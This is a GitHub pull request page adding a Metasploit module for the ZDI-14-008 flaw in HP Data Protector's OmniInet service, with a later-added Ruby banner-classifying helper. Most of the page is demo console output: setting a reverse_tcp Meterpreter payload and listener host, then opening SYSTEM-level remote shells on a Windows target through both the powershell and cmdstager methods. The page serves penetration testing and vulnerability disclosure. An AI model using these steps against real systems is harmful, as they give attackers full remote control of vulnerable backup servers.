
Add module for ZDI-14-008 #3066

Merged
merged 1 commit into from Mar 5, 2014

Conversation

jvazquez-r7
Contributor

We added ZDI-14-003 (#2891), but after reading http://ddilabs.blogspot.com.es/2014/02/fun-with-hp-data-protector-execbar.html, ZDI-14-003 is indeed a more powerful case. This module allows exploitation on Windows 2003 SP2 and Windows 2008 R2, with both the cmd stager and powershell methods. Written on the plane, so I hope there is nothing weird! :) If there is something to update/improve, just comment and I will update when possible!

Tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2

Verification

  • Install Windows 2003 SP2 or Windows 2008 R2
  • Install HP Data Protector version HP Data Protector A.06.20, internal build 370, or any other vulnerable version (6.xx < 6.21 is unpatched according to the advisory). Ask me for the installer if you can't figure out how to download it from the HP page. I had the installer archived. Not sure if it's still available on the HP site.
  • Be sure that the vulnerable OmniInet.exe service is running on TCP port 5555
  • Run the module as in the demo, and hopefully enjoy the sessions

Demo

  • check
msf exploit(hp_dataprotector_exec_bar) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(hp_dataprotector_exec_bar) > check

[*] 192.168.172.133:5555 - HP Data Protector version HP Data Protector A.06.20: INET, internal build 370, built on Friday, February 25, 2011, 11:41 AM
[*] 192.168.172.133:5555 - The target appears to be vulnerable.
  • powershell method
msf exploit(hp_dataprotector_exec_bar) > set target 1
target => 1
msf exploit(hp_dataprotector_exec_bar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hp_dataprotector_exec_bar) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(hp_dataprotector_exec_bar) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:5555 - Exploiting through Powershell...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.133:49375) at 2014-03-05 02:57:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-WT2AFYJYZEV
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 4 closed.  Reason: User exit
  • cmdstager method
msf exploit(hp_dataprotector_exec_bar) > set target 0
target => 0
msf exploit(hp_dataprotector_exec_bar) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Command Stager progress -   7.30% done (7499/102738 bytes)
[*] Command Stager progress -  14.60% done (14998/102738 bytes)
[*] Command Stager progress -  21.90% done (22497/102738 bytes)
[*] Command Stager progress -  29.20% done (29996/102738 bytes)
[*] Command Stager progress -  36.50% done (37495/102738 bytes)
[*] Command Stager progress -  43.79% done (44994/102738 bytes)
[*] Command Stager progress -  51.09% done (52493/102738 bytes)
[*] Command Stager progress -  58.39% done (59992/102738 bytes)
[*] Command Stager progress -  65.69% done (67491/102738 bytes)
[*] Command Stager progress -  72.99% done (74990/102738 bytes)
[*] Command Stager progress -  80.29% done (82489/102738 bytes)
[*] Command Stager progress -  87.59% done (89988/102738 bytes)
[*] Command Stager progress -  94.89% done (97487/102738 bytes)
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Command Stager progress - 100.00% done (102738/102738 bytes)
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.133:49376) at 2014-03-05 02:59:47 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-WT2AFYJYZEV
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 5 closed.  Reason: User exit
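An added example (not code from the PR or the Metasploit module): a small Ruby helper for asset inventory that classifies the OmniInet banner string the module's check prints above against the version rule stated in the verification notes (6.xx below 6.21 unpatched). The regex and the sample banner are assumptions based only on the output shown here.

```ruby
# Added example, not part of the PR or the module. Classifies an HP Data
# Protector banner such as the one printed by the module's check above.
# Version rule taken from the PR notes: 6.xx below 6.21 is unpatched.

# Assumed banner layout, modelled on the check output in the PR:
#   "HP Data Protector A.06.20: INET, internal build 370, built on ..."
BANNER_RE = /HP Data Protector A\.(\d+)\.(\d+)(?::\s*INET)?(?:,\s*internal build (\d+))?/

# Returns a hash with :version ("6.20"), :build (370 or nil) and :status
# (:unpatched, :patched or :unknown), or nil if this is not a DP banner.
def classify_dp_banner(banner)
  m = BANNER_RE.match(banner)
  return nil unless m
  major = m[1].to_i
  minor = m[2].to_i
  status =
    if major == 6
      minor < 21 ? :unpatched : :patched   # rule from the PR: 6.xx < 6.21
    else
      :unknown                              # PR only covers the 6.x train
    end
  {
    version: format('%d.%02d', major, minor),
    build: m[3] && m[3].to_i,
    status: status
  }
end

if __FILE__ == $0
  # Constructed sample, copied from the check output shown in the PR.
  sample = 'HP Data Protector A.06.20: INET, internal build 370, ' \
           'built on Friday, February 25, 2011, 11:41 AM'
  puts classify_dp_banner(sample).inspect
end
```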

@wchen-r7 wchen-r7 self-assigned this Mar 5, 2014
@Meatballs1
Contributor

I knew you would convert to the Powershell-side one day, young padawan.

wchen-r7 added a commit that referenced this pull request Mar 5, 2014
@wchen-r7 wchen-r7 merged commit 4e9350a into rapid7:master Mar 5, 2014
@jvazquez-r7 jvazquez-r7 deleted the zdi_14_008 branch November 18, 2014 15:59